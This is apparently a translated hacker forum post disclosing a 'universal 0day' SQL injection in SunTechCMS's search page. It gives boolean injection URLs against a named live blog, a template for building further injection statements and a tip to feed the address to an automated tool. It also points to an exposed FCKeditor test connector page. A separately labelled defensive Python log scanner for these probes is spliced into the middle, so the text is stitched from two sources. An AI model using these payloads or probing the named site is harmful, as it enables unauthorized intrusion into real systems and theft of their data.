Title: SunTechCMS search-type injection, universal 0day

Author: hackdn

Please credit the source when reposting.

Vulnerability:

hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=1%20and%20'%'='

hellxman.blog.51cto.com/Search.aspx?swhere=1%'and%201=2%20and%20'%'='

Build your own statement: %' and <injection statement> and '%25'='

If that is too much effort, pick a keyword and feed the address hellxman.blog.51cto.com/Search.aspx?swhere= into a tool.

Also, FCKeditor's test.html has not been removed: /fckeditor/editor/filemanager/connectors/test.html
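As an added defender's example (not code from the original post, nor from SunTechCMS or FCKeditor), the Python script below scans web-server log lines for the two things the post lists: the boolean-probe pattern on the search page (the same client sending a closed-quote `and 1=1` and `and 1=2` comparison against the same path) and any request for the leftover FCKeditor `test.html`. The log layout, the `swhere` parameter handling and every address in the sample are constructed assumptions for illustration; adapt the line regex to the real log format.

```python
import re
import urllib.parse
from collections import defaultdict

# Constructed IIS/W3C-style log lines (not from the original post). Addresses are
# placeholders from the TEST-NET ranges; only the request shape matters here.
SAMPLE_LOG = """\
2010-05-01 10:00:01 203.0.113.5 GET /Search.aspx swhere=cms 200
2010-05-01 10:00:07 203.0.113.5 GET /Search.aspx swhere=1%25'and%201=1%20and%20'%25'=' 200
2010-05-01 10:00:09 203.0.113.5 GET /Search.aspx swhere=1%25'and%201=2%20and%20'%25'=' 200
2010-05-01 10:01:00 198.51.100.7 GET /Search.aspx swhere=tom%27s%20blog 200
2010-05-01 10:02:00 198.51.100.7 GET /fckeditor/editor/filemanager/connectors/test.html - 404
"""

# Assumed log layout: date time client-ip method path query status
LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<path>\S+) (?P<query>\S+) (?P<status>\d+)$"
)

# A quote that closes the LIKE pattern, then AND with a numeric comparison such as
# 1=1 or 1=2. Both numbers are captured so true/false probes can be told apart.
BOOL_RE = re.compile(r"['\"]\s*and\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)

# Editor test pages that should not exist on a production site (path from the post).
EDITOR_TEST_PAGES = ("/fckeditor/editor/filemanager/connectors/test.html",)


def parse_line(line):
    """Split one log line into its fields; returns None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def search_term(query):
    """Return the decoded swhere= value (parameter name taken from the post), or None."""
    params = urllib.parse.parse_qs(query, keep_blank_values=True)
    values = params.get("swhere")
    return values[0] if values else None


def boolean_probe(value):
    """Classify a search term as a 'true' or 'false' boolean probe, or None for ordinary input."""
    if value is None:
        return None
    m = BOOL_RE.search(value)
    if not m:
        return None
    return "true" if m.group(1) == m.group(2) else "false"


def find_probes(log_text):
    """Return findings: one per complete true/false probe pair and one per editor-test-page hit."""
    findings = []
    seen = defaultdict(set)  # (client ip, path) -> subset of {"true", "false"}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].lower() in EDITOR_TEST_PAGES:
            findings.append({"ip": rec["ip"], "kind": "editor_test_page", "path": rec["path"]})
        kind = boolean_probe(search_term(rec["query"]))
        if kind:
            key = (rec["ip"], rec["path"])
            seen[key].add(kind)
            if seen[key] == {"true", "false"}:
                findings.append({"ip": rec["ip"], "kind": "boolean_probe_pair", "path": rec["path"]})
                seen[key].clear()  # report each completed pair once
    return findings


if __name__ == "__main__":
    for f in find_probes(SAMPLE_LOG):
        print(f"{f['ip']}: {f['kind']} on {f['path']}")
```

A single `1=1` request is only a weak signal (it also appears in harmless scanner noise); the pair of a true and a false comparison from one client against one page is the shape of a real boolean-based test, which is why the script reports pairs rather than single hits. The apostrophe in `tom's blog` shows the check does not fire on ordinary search terms that merely contain a quote.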

PS: I've been testing a lot of websites lately and casually looked for vulnerabilities in their source code. Most of them are not very mainstream CMSes; I'm keeping this as a record for myself. In a couple of days I'll post a Discuz hole for fun.